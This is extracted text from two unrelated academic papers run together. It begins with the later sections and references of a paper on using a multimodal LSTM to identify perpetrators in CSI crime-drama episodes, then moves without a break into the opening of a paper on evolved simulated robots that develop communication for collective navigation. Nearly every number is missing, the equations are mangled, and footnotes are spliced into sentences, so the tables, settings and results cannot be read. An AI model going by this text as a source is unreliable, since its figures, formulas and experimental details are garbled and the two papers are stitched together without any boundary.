network which was optimized for object classifica- tion (inception-v ; szegedy et al. ( )). acoustic modality for each sentence, we extract the audio track from the video which includes all sounds and background music but no spoken dia- log. we then obtain mel-frequency cepstral coef- ficient (mfcc) features from the continuous sig- nal. mfcc features were originally developed in the context of speech recognition (davis and mer- melstein, ; sahidullah and saha, ), but we also experimented with multiple frames per sentence but did not observe any improvement in performance. have also been shown to work well for more gen- eral sound classification (chachada and kuo, ). we extract a -dimensional mfcc feature vector for every five milliseconds in the video. for each input sentence, we sample five mfcc feature vec- tors from its associated time interval, and concate- nate them in chronological order into the acoustic input xa. modality fusion our model learns to fuse multi- modal input as part of its overall architecture. we use a general method to obtain any combination of input modalities (i.e., not necessarily all three). single modality inputs are concatenated into an m-dimensional vector (where m is the sum of di- mensionalities of all the input modalities). we then multiply this vector with a weight matrix wh of di- mension m×n, add an m-dimensional bias bh, and pass the result through a rectified linear unit (relu): xh = relu([xs;xv;xa]wh + bh) the resulting multi-modal representation xh is of di- mension n and passed to the lstm (see figure ). evaluation in our experiments we investigate what type of knowledge and strategy are necessary for identify- ing the perpetrator in a csi episode. in order to shed light on the former question we compare variants of our model with access to information from different modalities. we examine different inference strate- gies by comparing the lstm to three baselines. the first one lacks the ability to flexibly fuse multi-modal information (a crf), while the second one does not have a notion of history, classifying inputs indepen- dently (a multilayer perceptron). our third baseline is a rule-base system that neither uses multi-modal inputs nor has a notion of history. we also compare the lstm to humans watching csi. before we re- port our results, we describe our setup and compari- son models in more detail. . experimental settings our csi data consists of episodes giving rise to cases (see table ). the model was trained on preliminary experiments showed that concatenation out- performs averaging or relying on a single feature vector. cases using cross-validation (five splits with / training/test cases). the remaining cases were used as truly held-out test data for final evaluation. we trained our model using adam with stochastic gradient-descent and mini-batches of six episodes. weights were initialized randomly, except for word embeddings which were initialized with pre-trained -dimensional glove vectors (penning- ton et al., ), and fine-tuned during training. we trained our networks for epochs and report the best result obtained during training. all results are averages of five runs of the network. parameters were optimized using two cross-validation splits. the sentence convolution layer has three filters of sizes , , each of which after convolution returns -dimensional output. the final sentence represen- tation xs is obtained by concatenating the output of the three filters and is of dimension . we set the size of the hidden representation of merged cross- modal inputs xh to . the lstm has one layer with nodes. we set the learning rate to . and apply dropout with probability of . . we compared model output against the gold stan- dard of perpetrator mentions which we collected as part of our annotation effort (second pass). . model comparison crf conditional random fields (lafferty et al., ) are probabilistic graphical models for se- quence labeling. the comparison allows us to exam- ine whether the lstm’s use of long-term memory and (non-linear) feature integration is beneficial for sequence prediction. we experimented with a vari- ety of features for the crf, and obtained best results when the input sentence is represented by concate- nated word embeddings. mlp we also compared the lstm against a multi-layer perceptron with two hidden layers, and a softmax output layer. we replaced the lstm in our overall network structure with the mlp, keeping the methodology for sentence convolution and modal- ity fusion and all associated parameters fixed to the values described in section . . the hidden layers of the mlp have relu activations and a layer-size of , as in the lstm. we set the learning rate to . . the mlp makes independent predictions for each element in the sequence. this comparison model modality cross-val held-out t v a pr re f pr re f pro + – – . . . . . . crf + – – . . . . . . mlp + – – . . . . . . + + – . . . . . . + – + . . . . . . + + + . . . . . . lstm + – – . . . . . . + + – . . . . . . + – + . . . . . . + + + . . . . . . humans . . . . . . table : precision (pr) recall (re) and f for detecting the minority class (perpetrator mentioned) for humans (bot- tom) and various systems. we report results with cross- validation (center) and on a held-out data set (right) using the textual (t) visual (v), and auditory (a) modalities. sheds light on the importance of sequential informa- tion for the perpetrator identification task. all re- sults are best checkpoints over training epochs, averaged over five runs. pro aside from the supervised models described so far, we developed a simple rule-based system which does not require access to labeled data. the system defaults to the perpetrator class for any sen- tence containing a personal (e.g., you ), possessive (e.g., mine ) or reflexive pronoun (e.g., ourselves ). in other words, it assumes that every pronoun refers to the perpetrator. pronoun mentions were identi- fied using string-matching and a precompiled list of pronouns. this system cannot incorporate any acoustic or visual data. human upper bound finally, we compared model performance against humans. in our anno- tation task (section . ), participants annotate sen- tences incrementally, while watching an episode for the first time. the annotations express their belief as to whether the perpetrator is mentioned. we evalu- ate these first-pass guesses against the gold standard (obtained in the second-pass annotation). . . . . p re c is io n i n f in a l % o f th e e p is o d e test episode id lstm human lstm avg human avg figure : precision in the final % of an episode, for test episodes from five cross-validation splits. we show scores per episode and global averages (horizontal bars). episodes are ordered by increasing model precision. . which model is the best detective? we report precision, recall and f on the minority class, focusing on how accurately the models iden- tify perpetrator mentions. table summarizes our results, averaged across five cross-validation splits (left) and on the truly held-out test episodes (right). overall, we observe that humans outperform all comparison models. in particular, human precision is superior, whereas recall is comparable, with the exception of pro which has high recall (at the ex- pense of precision) since it assumes that all pro- nouns refer to perpetrators. we analyze the differ- ences between model and human behavior in more detail in section . . with regard to the lstm, both visual and acoustic modalities bring improvements over the textual modality, however, their contribu- tion appears to be complementary. we also exper- imented with acoustic and visual features on their own, but without high-level textual information, the lstm converges towards predicting the majority class only. results on the held-out test set reveal that our model generalizes well to unseen episodes, de- spite being trained on a relatively small data sample compared to standards in deep learning. the lstm consistently outperforms the non- incremental mlp. this shows that the ability to uti- lize information from previous inputs is essential for this task. this is intuitively plausible; in order to identify the perpetrator, viewers must be aware of the plot’s development and make inferences while the episode evolves. the crf is outperformed by all other systems, including rule-based pro. in con- trast to the mlp and pro, the crf utilizes sequen- tial information, but cannot flexibly fuse informa- tion from different modalities or exploit non-linear mappings like neural models. the only type of input which enabled the crf to predict perpetra- tor mentions were concatenated word embeddings (see table ). we trained crfs on audio or visual features, together with word embeddings, however these models converged to only predicting the ma- jority class. this suggests that crfs do not have the capacity to model long complex sequences and draw meaningful inferences based on them. pro achieves a reasonable f score but does so because it achieves high recall at the expense of very low precision. the precision-recall tradeoff is much more balanced for the neural systems. . can the model identify the perpetrator? in this section we assess more directly how the lstm compares against humans when asked to identify the perpetrator by the end of a csi episode. specifically, we measure precision in the final % of an episode, and compare human performance (first-pass guesses) and an lstm model which uses all three modalities. figure shows precision results for test episodes (across five cross-validation splits) and average precision as horizontal bars. perhaps unsurprisingly, human performance is su- perior; however, the model achieves an average pre- cision of % which is encouraging (compared to episode (season ): “got murder?” episode (season ): “a night at the movies” . . . . sc o re lstm f human f c o u n t lstm tp human tp gold tp c o u n t #sentences observed lstm tp human tp gold tp . . . . sc o re lstm f human f c o u n t lstm tp human tp gold tp c o u n t #sentences observed lstm tp human tp gold tp figure : human and lstm behavior over the course of two episodes (left and right). top plots show cumulative f ; true positives (tp) are shown cumulatively (center) and as individual counts for each interval (bottom). statistics relating to gold perpetrator mentions are shown in black. red vertical bars show when humans press the red button to indicate that they (think they) have identified the perpetrator. % achieved by humans). our results also show a moderate correlation between the model and hu- mans: episodes which are difficult for the lstm (see left side of the plot in figure ) also result in lower human precision. two episodes on the very left of the plot have % precision and are special cases. the first one revolves around a suicide, which is not strictly speaking a crime, while the second one does not mention the perpetrator in the final %. . how is the model guessing? we next analyze how the model’s guessing abil- ity compares to humans. figure tracks model behavior over the course of two episodes, across equally sized intervals. we show the cumula- tive development of f (top plot), cumulative true positive counts (center plot), and true positive counts within each interval (bottom plot). red bars indicate times at which annotators pressed the red button. figure (right) shows that humans may outper- form the lstm in precision (but not necessarily in recall). humans are more cautious at guessing the perpetrator: the first human guess appears around sentence (see the leftmost red vertical bars in figure right), the first model guess around sen- tence , and the first true mention around sentence . once humans guess the perpetrator, however, they are very precise and consistent. interestingly, model guesses at the start of the episode closely fol- low the pattern of gold-perpetrator mentions (bottom plots in figure ). this indicates that early model guesses are not noise, but meaningful predictions. further analysis of human responses is illustrated in figure . for each of our three annotators we plot the points in each episode where they press the red button to indicate that they know the perpetra- tor (bottom). we also show the number of times (all three) annotators pressed the red button individually for each interval and cumulatively over the course of the episode. our analysis reveals that viewers tend to press the red button more towards the end, which is not unexpected since episodes are inherently de- signed to obfuscate the identification of the perpe- trator. moreover, figure suggests that there are two types of viewers: eager viewers who like our model guess early on, change their mind often, and therefore press the red button frequently (annotator pressed the red button . times on average per . . . . portion of episode lapsed annotator annotator annotator all annotators frequency all annotators cumulative figure : number of times the red button is pressed by each anno- tator individually (bottom) and by all three within each time interval and cumulatively (top). times are normalized with respect to length. statistics are averaged across / / cases per annotator / / . first correct perpetrator prediction min max avg lstm human table : sentence id in the script where the lstm and humans predict the true perpetrator for the first time. we show the earliest (min) latest (max) and av- erage (avg) prediction time over test episodes (five cross-validation splits). episode (season ): “let the seller beware” s s s s s s s s s grissom pulls out a small evidence bag with the filling he puts it on the table tooth fill- ing - - brass we also found your finger- prints and your hair peter b. look i’m sure you’ll find me all over the house peter b. i wanted to buy it peter b. i was ev- erywhere brass well you made sure you were every- where too didn’t you? episode (season ): “committed” s s s s s s s s grissom what’s so amusing? adam trent so let’s say you find out who did it and maybe it’s me. adam trent what are you going to do? adam trent are you going to convict me of murder and put me in a bad place? adam smirks and starts biting his nails. grissom is it you? adam trent check the files sir. adam trent i’m a rapist not a mur- derer. table : excerpts of csi episodes together with model predictions. model confidence (p(l = )) is illustrated in red, with darker shades corresponding to higher confidence. true perpetrator mentions are highlighted in blue. top: a conversation involving the true perpetrator. bottom: a conversation with a suspect who is not the perpetrator. episode) and conservative viewers who guess only late and press the red button less frequently (on av- erage annotator pressed the red button . times per episode, and annotator and . times). notice that statistics in figure are averages across several episodes each annotator watched and thus viewer behavior is unlikely to be an artifact of individual episodes (e.g., featuring more or less suspects). ta- ble provides further evidence that the lstm be- haves more like an eager viewer. it presents the time in the episode (by sentence count) where the model correctly identifies the perpetrator for the first time. as can be seen, the minimum and average identifi- cation times are lower for the lstm compared to human viewers. table shows model predictions on two csi screenplay excerpts. we illustrate the degree of the model’s belief in a perpetrator being mentioned by color intensity. true perpetrator mentions are high- lighted in blue. in the first example, the model mostly identifies perpetrator mentions correctly. in the second example, it identifies seemingly plausible sentences which, however, refer to a suspect and not the true perpetrator. . what if there is no perpetrator? in our experiments, we trained our model on csi episodes which typically involve a crime, commit- ted by a perpetrator, who is ultimately identified. how does the lstm generalize to episodes without c o u n t #sentences observed lstm fp human fp figure : cumulative counts of false positives (fp) for the lstm and a human viewer for an episode with no perpetrator (the victim committed suicide). red vertical bars show the times at which the viewer pressed the red button indicating that they (think they) have identified the perpetrator. a crime, e.g., because the “victim” turns out to have committed suicide? to investigate how model and humans alike respond to atypical input we present both with an episode featuring a suicide, i.e., an episode which did not have any true positive perpe- trator mentions. figure tracks the incremental behavior of a hu- man viewer and the model while watching the sui- cide episode. both are primed by their experience with csi episodes to identify characters in the plot as potential perpetrators, and consequently predict false positive perpetrator mentions. the human re- alizes after roughly two thirds of the episode that there is no perpetrator involved (he does not anno- tate any subsequent sentences as “perpetrator men- tioned”), whereas the lstm continues to make per- petrator predictions until the end of the episode. the lstm’s behavior is presumably an artifact of the re- curring pattern of discussing the perpetrator in the very end of an episode. conclusions in this paper we argued that crime drama is an ideal testbed for models of natural language understand- ing and their ability to draw inferences from com- plex, multi-modal data. the inference task is well- defined and relatively constrained: every episode poses and answers the same “whodunnit” ques- tion. we have formalized perpetrator identifica- tion as a sequence labeling problem and developed an lstm-based model which learns incrementally from complex naturalistic data. we showed that multi-modal input is essential for our task, as well an incremental inference strategy with flexible ac- cess to previously observed information. compared to our model, humans guess cautiously in the begin- ning, but are consistent in their predictions once they have a strong suspicion. the lstm starts guessing earlier, leading to superior initial true-positive rates, however, at the cost of consistency. there are many directions for future work. be- yond perpetrators, we may consider how suspects emerge and disappear in the course of an episode. note that we have obtained suspect annotations but did not use them in our experiments. it should also be interesting to examine how the model behaves out-of-domain, i.e., when tested on other crime se- ries, e.g., “law and order”. finally, more detailed analysis of what happens in an episode (e.g., what actions are performed, by who, when, and where) will give rise to deeper understanding enabling ap- plications like video summarization and skimming. acknowledgments the authors gratefully ac- knowledge the support of the european research council (award number ; frermann, lap- ata) and h eu project summa (award number /h -ict- ; cohen). we also thank our annotators, the tacl editors and anonymous re- viewers whose feedback helped improve the present paper, and members of edinburghnlp for helpful discussions and suggestions. references stanislaw antol, aishwarya agrawal, jiasen lu, m̃argaret mitchell, dhruv batra, c. lawrence zitnick, and devi parikh. . vqa: visual question an- swering. in proceedings of the ieee international conference on computer vision (iccv), pages – , santiago, chile. piotr bojanowski, francis bach, ivan laptev, jean ponce, cordelia schmid, and josef sivic. . finding ac- tors and actions in movies. in the ieee international conference on computer vision (iccv), pages – , sydney, australia. john s. boreczky and lynn d. wilcox. . a hid- den markov model framework for video segmentation using audio and image features. in proceedings of the ieee international conference on acoustics, speech and signal processing (icassp), pages – , seattle, washington, usa. samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large anno- tated corpus for learning natural language inference. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal. elia bruni, nam khanh tran, and marco baroni. . multimodal distributional semantics. journal of arti- ficial intelligence research, ( ): – , january. sachin chachada and c.-c. jay kuo. . environmen- tal sound recognition: a survey. apsipa transactions on signal and information processing, . jacob cohen. . a coefficient of agreement for nom- inal scales. educational and psychological measure- ment, ( ): – . timothee cour, chris jordan, eleni miltsakaki, and ben taskar. . movie/script: alignment and parsing of video and text transcription. in proceedings of the th european conference on computer vision, pages – , marseille, france. steven b. davis and paul mermelstein. . com- parison of parametric representations for monosyllabic word recognition in continuously spoken sentences. in alex waibel and kai-fu lee, editors, readings in speech recognition, pages – . morgan kaufmann publishers inc., san francisco, california, usa. nevenka dimitrova, lalitha agnihotri, and gang wei. . video classification based on hmm using text and faces. in proceedings of the th european signal processing conference (eusipco), pages – . ieee. desmond elliott and frank keller. . image descrip- tion using visual dependency representations. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa. philip john gorinski and mirella lapata. . movie script summarization as graph-based scene extraction. in proceedings of the conference of the north american chapter of the association for computa- tional linguistics: human language technologies, pages – , denver, colorado, usa. karl moritz hermann, tomas kocisky, edward grefen- stette, lasse espeholt, will kay, mustafa suleyman, and phil blunsom. . teaching machines to read and comprehend. in c. cortes, n. d. lawrence, d. d. lee, m. sugiyama, and r. garnett, editors, advances in neural information processing systems , pages – . curran associates, inc. felix hill, antoine bordes, sumit chopra, and jason we- ston. . the goldilocks principle: reading chil- dren’s books with explicit memory representations. in proceedings of the rd international conference on learning representations (iclr), san diego, califor- nia, usa. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – , november. justin johnson, ranjay krishna, michael stark, li-jia li, david a shamma, michael s bernstein, and li fei- fei. . image retrieval using scene graphs. in proceedings of the ieee conference on com- puter vision and pattern recognition (cvpr), pages – , boston, massachusetts, usa. andrej karpathy and li fei-fei. . deep visual- semantic alignments for generating image descrip- tions. in proceedings of the ieee conference on com- puter vision and pattern recognition, pages – , boston, massachusetts. douwe kiela and léon bottou. . learning image embeddings using convolutional neural networks for improved multi-modal semantics. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilis- tic models for segmenting and labeling sequence data. in proceedings of the th international conference on machine learning, pages – , san francisco, ca, usa. morgan kaufmann publishers inc. angeliki lazaridou, nghia the pham, and marco ba- roni. . combining language and vision with a multimodal skip-gram model. in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – , denver, colorado, usa. dahua lin, sanja fidler, chen kong, and raquel urta- sun. . visual semantic search: retrieving videos via complex textual queries. in ieee conference on computer vision and pattern recognition, pages – , columbus, ohio, usa. cory s. myers and lawrence r. rabiner. . a com- parative study of several dynamic time-warping algo- rithms for connected word recognition. the bell sys- tem technical journal, ( ): – . milind r. naphide and thomas s. huang. . a prob- abilistic framework for semantic video indexing, filter- ing, and retrieval. ieee transactions on multimedia, ( ): – . luis gilberto mateos ortiz, clemens wolff, and mirella lapata. . learning to interpret and describe ab- stract scenes. in proceedings of the naacl: hu- man language technologies, pages – , den- ver, colorado, usa. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word rep- resentation. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar. pranav rajpurkar, jian zhang, konstantin lopyrev, and percy liang. . squad: , + questions for machine comprehension of text. in proceedings of the conference on empirical methods in natu- ral language processing, pages – , austin, texas, usa. zeeshan rasheed, yaser sheikh, and mubarak shah. . on the use of computable features for film clas- sification. ieee transactions on circuits and systems for video technology, ( ): – . matthew richardson, christopher j.c. burges, and erin renshaw. . mctest: a challenge dataset for the open-domain machine comprehension of text. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa. tim rocktäschel, edward grefenstette, karl moritz her- mann, tomas kocisky, and phil blunsom. . rea- soning about entailment with neural attention. in proceedings of the th international conference on learning representations (iclr), san juan, puerto rico. anna rohrbach, atousa torabi, marcus rohrbach, niket tandon, christopher pal, hugo larochelle, aaron courville, and bernt schiele. . movie de- scription. international journal of computer vision, ( ): – . md sahidullah and goutam saha. . design, analy- sis and experimental evaluation of block based trans- formation in mfcc computation for speaker recogni- tion. speech communication, ( ): – . jitao sang and changsheng xu. . character-based movie summarization. in proceedings of the th acm international conference on multimedia, pages – , firenze, italy. carina silberer, vittorio ferrari, and mirella lapata. . visually grounded meaning representations. ieee transactions on pattern analysis and machine intelligence, . josef sivic, mark everingham, and andrew zisserman. . “who are you?” – learning person specific classifiers from video. in ieee conference on com- puter vision and pattern recognition, pages – , miami, florida, usa. ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in proceedings of the th international conference on neural information processing systems, nips’ , pages – , cambridge, ma, usa. mit press. christian szegedy, sergey ioffe, and vincent vanhoucke. . inception-v , inception-resnet and the im- pact of residual connections on learning. corr, abs/ . . makarand tapaswi, martin bäuml, and rainer stiefelha- gen. . aligning plot synopses to videos for story- based retrieval. international journal of multimedia information retrieval, ( ): – . makarand tapaswi, yukun zhu, rainer stiefelhagen, antonio torralba, raquel urtasun, and sanja fidler. . movieqa: understanding stories in movies through question-answering. in the ieee conference on computer vision and pattern recognition (cvpr), pages – , las vegas, nevada. subhashini venugopalan, marcus rohrbach, jeff don- ahue, raymond j. mooney, trevor darrell, and kate saenko. a. sequence to sequence – video to text. in proceedings of the international conference on computer vision (iccv), pages – , santi- ago, chile. subhashini venugopalan, huijuan xu, jeff donahue, marcus rohrbach, raymond mooney, and kate saenko. b. translating videos to natural lan- guage using deep recurrent neural networks. in pro- ceedings the conference of the north american chapter of the association for computational linguis- tics – human language technologies (naacl hlt ), pages – , denver, colorado, june. oriol vinyals, alexander toshev, samy bengio, and du- mitru erhan. . show and tell: a neural image caption generator. proceedings of the ieee con- ference on computer vision and pattern recognition (cvpr), pages – . ellen m. voorhees and dawn m. tice. . building a question answering test collection. in acm special in- terest group on information retrieval (sigir), pages – , athens, greece. jason weston, antoine bordes, sumit chopra, and tomas mikolov. . towards ai-complete ques- tion answering: a set of prerequisite toy tasks. corr, abs/ . . kelvin xu, jimmy ba, ryan kiros, kyunghyun cho, aaron courville, ruslan salakhudinov, rich zemel, and yoshua bengio. . show, attend and tell: neu- ral image caption generation with visual attention. in proceedings of the nd international conference on machine learning, pages – , boston, mas- sachusetts, usa. yi yang, wen-tau yih, and christopher meek. . wikiqa: a challenge dataset for open-domain ques- tion answering. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , lisbon, portugal. mark yatskar, luke zettlemoyer, and ali farhadi. . situation recognition: visual semantic role labeling for image understanding. in proceedings of the ieee conference on computer vision and pattern recogni- tion (cvpr), pages – , zurich, switzerland. wojciech zaremba, ilya sutskever, and oriol vinyals. . recurrent neural network regularization. corr, abs/ . . yukun zhu, ryan kiros, rich zemel, ruslan salakhut- dinov, raquel urtasun, antonio torralba, and sanja fidler. . aligning books and movies: towards story-like visual explanations by watching movies and reading books. in the ieee international conference on computer vision (iccv), santiago, chile. ws-procs x emergence of communication in embodied agents evolved for the ability to solve a collective navigation problem davide marocco stefano nolfi institute of cognitive science and technologies, cnr, viale marx rome, , italy [davide.marocco; stefano.nolfi]@istc.cnr.it in this paper we present the results of an experiment in which a collection of simulated robots that are evolved for the ability to solve a collective navigation problem develop a communication system that allows them to better cooperate. the analysis of the obtained results indicates how evolving robots develop a non-trivial communication system and exploit different communication modalities. results also indicate how the possibility to co-adapt the robots’ individual and social/communicative behaviour plays a key role in the development of progressively more complex and effective individuals. . introduction the development of embodied agents able to interact autonomously with the physical world and to communicate on the basis of a self-organizing communication system is a new exciting field of research (steels and vogt, ; cangelosi and parisi, ; steels, ; steels and kaplan, ; marocco, cangelosi and nolfi, ; quinn et al, ; for a review see kirby, ; steels, ; wagner et al., ; nolfi, ). the objective is to identify methods of how a population of agents equipped with a sensory-motor system and a cognitive apparatus can develop a grounded communication system and use their communication abilities to solve a given problem. answering this question is important for both scientific and technological reasons. from a scientific point of view, understanding how communication abilities and a communication system might emerge in a population of interacting embodied agents might shed lights on the evolution of animal communication and on the origin of language. from a technological point of view, understanding the fundamental principles involved might lead to the development of innovative communication methods for multi-agent software systems, autonomous robots, and ubiquitous computing devices. in this paper we present the results of an experiment in which a collection of simulated robots that are evolved for the ability to solve a collective navigation problem develop a communication system that allows them to cooperate better. robots are provided with simple sensory-motor systems that allow them to move, produce signals with varying frequencies, and gather information from their physical and social environment (including signals produced by other agents). since the chosen problem admits a variety of qualitatively different solutions and since robots are selected on the basis of their ability to solve the collective navigation problem (and not on the basis of their communication abilities), evolving robots are left free to determine the circumstances in which communication is used, the structure of the communication system (i.e. the number, the type and the “meaning” of signals), the communication modalities (i.e. the role played by communicating individuals), and the relation between individual and social/communication abilities. the analysis of the obtained results indicates how evolving robots develop a non-trivial communication system and exploit different communication modalities. results also indicate how the possibility to co-adapt the robots’ individual and social communicative behaviours play a key role in the development of progressively more complex and effective individuals. in the following section we will review the related literature. in section , we will describe our experimental setup and we will show how a communication ability emerges as a result of an indirect selective pressure. in section , we will describe the type of signals produced by evolved robots and their effects on other robots’ behaviours. in section we will describe the modalities with which evolved individuals communicate. in section , we will describe the relation between the individual and social/communicative behaviour. finally, in section , we will discuss the implications of the obtained results. . related literature in their pioneering work on evolution of communication werner and dyer ( ) evolved a simulated population of male and female agents living in a toroidal grid environment for the ability to ‘mate’ (i.e. for the ability of male agents to reach the physical location of female agents). the sensory-motor structure of the agents was designed so as to force them to rely on signalling behaviour and to prevent any possible alternative strategy. indeed, females are immobile (i.e. they cannot reach males) and males are blind (i.e. they cannot detect the position of females). females are allowed to detect the position and orientation of the closest male located in the x cells area surrounding them and to send signals (i.e. vectors of binary values) to all males located in the same surrounding area. males, on the other hand, are allowed to detect the signals produced by females and to move. by analyzing the obtained results, the authors showed how evolved individuals were able to solve the mating problem by exploiting their communication ability despite the fact that communication was not explicitly rewarded in the fitness function. by analysing how evolved males modified their motor behaviour on the basis of the signals detected, the authors showed how evolved females produced few different signals whose effect could be described with sentences like “go forward”, “turn left”, and “turn right”. more recently, cangelosi and parisi ( ) and marocco et al. ( ) demonstrated how communication can emerge also in experimental settings in which communication is not necessarily required to solve adaptive problems, but it allows individuals to achieve better performance. in marocco et al. ( ), for example, a population of robotic arm controllers have been evolved for the ability to discriminate objects with different shapes (i.e. spherical or cubic objects) on the basis of tactile sensory information by continuing to touch spherical objects while avoiding cubic objects. evolving robots are asked to play alternatively the role of speaker and hearer. when they assume the role of speaker they only receive as input the state of tactile sensors and are allowed to produce a vector of floating point value to ‘name’ the object. when they assume the role of hearer, they receive as input both tactile and communication information (i.e. the vector of floating point number produced by a speaker agent that previously interacted with the same object). evolved individuals display an ability to discriminate the two type of objects and to produce the appropriate motor behaviour (i.e. continuing to touch or avoiding the object) on the basis of tactile sensory information only but they also develop an ability to name the two objects with different patterns and to use these patterns to discriminate the objects immediately, thus avoiding to waste the time necessary to discriminate objects through physical interactions. quinn et al. (quinn ; quinn et al, ) evolved a team of mobile robots for the ability to move while remaining close to one another. robots are only provided with proximity sensors and therefore do not have dedicated communication channels. despite of that, they evolve a primitive form of implicit communication based on bodily movement that allows them to coordinate and to assume different roles (see also baldassarre et al, ). this is achieved through two sub-behaviours: ( ) an approaching behaviour in which one of the two robots tends to produce a sustained level of activation on the infrared sensors of the other robot, and ( ) a front-inversion behaviour in which the robot that experiences a sustained level of activation in its infrared sensors inverts its direction of movement. the combination of these two sub-behaviours, in fact, allows the two robots to align and to assume the role of follower and leader, respectively. finally, di paolo ( ) reported the results of a set of experiments in which two simulated robots moving in an arena have been evolved for the ability to approach each other and to remain close together as long as possible. robots are provided with two motors controlling the two wheels, a sound organ able to produce sounds with different intensities, and two sound sensors symmetrically placed at ± degrees with respect to the frontal side of the robot that detects the intensity of the sound produced by the two robots. evolved robots exploit the possibility to modulate the intensity of the produced sounds by producing rhythmical sounds with varying intensities phase-locked at some value near perfect anti- phase. like the authors of the models reviewed above, we are interested in building a model in which communication can emerge without being explicitly rewarded. however, we are also interested in experimental set-ups in which individual and social/communicative behaviour can co-evolve by mutually shaping one another. moreover, we are interested in studying how individuals might discover categories that are useful from a communication point of view and that are not already explicitly or implicitly identified in the experimental setting. finally, we are interested in studying how not only communication abilities but also communication modalities, that regulate how individuals interact/communicate, can emerge as a result of an indirect selective pressure. for this reason, we will not impose a restricted and predefined interaction schema and we will leave robots free to determine the modality with which they will interact. by restricted and predefined interaction schema we mean the interaction modality adopted for example in werner and dyer ( ), in which females and males individuals can only play the role of the speaker and hearer, respectively. or the interaction modality adopted in cangelosi and parisi ( ) and marocco et al. ( ), in which, agents alternatively assume the role of speaker or hearer and in which speakers are allowed to send to hearer robots a signal consisting of a single pattern after having interacted for a certain amount of time with the same object that will be experienced by the hearer. . experimental set-up and emergence of communication a group of four simulated robots live in a square arena of x cm surrounded by walls that contains two circular target areas (see figure , left). the robots have a circular body with a radius of cm and are provided with: two motors controlling the two corresponding wheels, one communication actuator capable of sending signals with varying frequencies (signals are encoded as floating point values ranging from . to . ), eight infrared sensors (that detect obstacles up to a distance of about cm), one ground sensor (which, by detecting the colour of the floor, can ascertain whether the robot is located on a target area or not), and four communication sensors that detect signals produced by other robots up to a distance of cm from four corresponding directions (i.e. frontal [ o- o], rear [ o- o], left [ o- o], right [ o- o]) . the implementation of communication sensors are shaped in a way that allows robots to detect signals emitted by only a single robot for each direction. we are currently trying to implement these robots in hardware. robots’ signalling production and detection system will be based on designer systems ds-ircm infrared wireless communication modules sold by totalrobots, that allow the formation of a local bi-directional wireless network, and appropriate software routines. communication between modules only occurs within a given angular range and within a distance up to meters. interferences between modules are prevented by hardware and software routines that check the intensity of incoming signals. figure . left: the environment and the robots. the square represents the arena surrounded by walls. the two grey circles represent two target areas. the four black circles represent four robots. right: the neural controller of evolving robots. internal neurons and recurrent connections are only included in one of the two experimental settings (see text). the robots’ neural controllers consist of neural networks with sensory neurons (that encode the activation states of the corresponding sensors and the activation state of the communication actuator at time t- , i.e. each robot can hear its own emitted signal at the previous time step) directly connected to the three motor neurons that control the desired speed of the two wheels and the communication signal produced by the robot. in a first experimental setting, neural controllers did not include internal neurons and recurrent connections. in the second experimental setting, neural controllers also included two internal neurons with recurrent connections. on both case the output of motor neurons was computed according to the logistic function ( ). in the case of the second experimental setting, the output of sensory and internal neurons was computed according to function ( ) and ( ), respectively (for a detailed description of these activation functions and the relation with other related models, see nolfi [ ]). we will call the robots of the former experimental setting reactive robots (since in their case motor actions can only be determined on the basis of the current sensory state, plus the copy of the communication neuron at the time t- ) and the robots of the latter experimental setting non-reactive robots (since in their case the motor actions are also influenced by previous sensory and internal states). ∑+= i iijjj owta ( ) ajj e o −+ = ( ) ( ) ( )jjtjj ioo ττ −+= − ( ) ( ) ( ) ( )jatjj jeoo ττ −++= −−− ( ) with aj being the activity of the jth neuron, tj being the bias of the jth neuron, wij the weight of the incoming connections from the ith to the jth neuron, oi the output of the ith neuron, oj(t- ) the output of the jth neuron at the previous time step, τj the time constant of the jth neuron, and ij the intensity of the jth sensors. robots were evolved for the ability to find and remain in the two target areas by subdividing themselves equally between the two areas. each team of four robots was allowed to "live" for trials, lasting seconds (i.e. time steps of ms each). at the beginning of each trial the position and the orientation of the robots was randomly assigned outside the target areas. the fitness of the team of robots consists of the sum of . scores for each robot located in a target area and a score of - . for each extra robot (i.e. each robot exceeding the maximum number of two) located in a target area. the total fitness of a team is computed by summing the fitness gathered by the four robots in each time step. the initial population consisted of randomly generated genotypes that encoded the connection weights, the biases, and the time constants (in the case of non-reactive robots) of corresponding neural controllers (each parameter is encoded with bits and normalized in the range [– . , + . ], in the case of connection weights and biases, and in the range [ . , . ], in the case of time constants). each genotype is translated into identical neural controllers that are embodied in the four corresponding robots (i.e. teams are homogeneous and consist of four identical robots, for a discussion about this point and alternative selection schemas see quinn, , ; quinn et al. ; baldassarre et al. ). the best genotypes of each generation were allowed to reproduce by generating five copies each, with % of their bits replaced with a new randomly selected value. the evolutionary process lasted generations (i.e. the process of testing, selecting and reproducing robots is iterated times). the experiment was replicated times for each of the two experimental conditions (reactive and non-reactive neural controllers). figure . the behaviour displayed by the team of evolved robots of one of the best replications for reactive (left) and non-reactive robots (right). the square and the grey circles indicate the arena and the target area respectively. lines inside the arena indicate the trajectory of the four robots during a trial. the numbers indicate the starting and ending position of the corresponding robot (the ending position is marked with a white circle). by analysing the behaviour of one of the best teams of evolved robots for the two experimental conditions we can see how both reactive and non-reactive robots are able find and remain in the two target areas by equally distributing themselves between the two. figure (left) shows a typical behaviour exhibited by reactive robots. in this example robots # and # quickly reach two different empty target areas. then, robot # joins robot # in the top-left target area. robots # , approaches and avoids the top-left target area (that already contains two robots) and later joins the bottom-left target area. in the example shown in the right part of figure , that displays a typical behaviour exhibited by non-reactive robots, robots # and # quickly reach two different empty target areas. later on, robot # and then robot # approach and enter the bottom-right target area. as soon as the third robot (i.e. robot # ) enters the area, robot # leaves the bottom-right target area and, after exploring the environment for a while, enters and remains in the top-left target area. to determine whether the possibility to signal and to use other robots’ signals is exploited by evolving robots and whether the type of 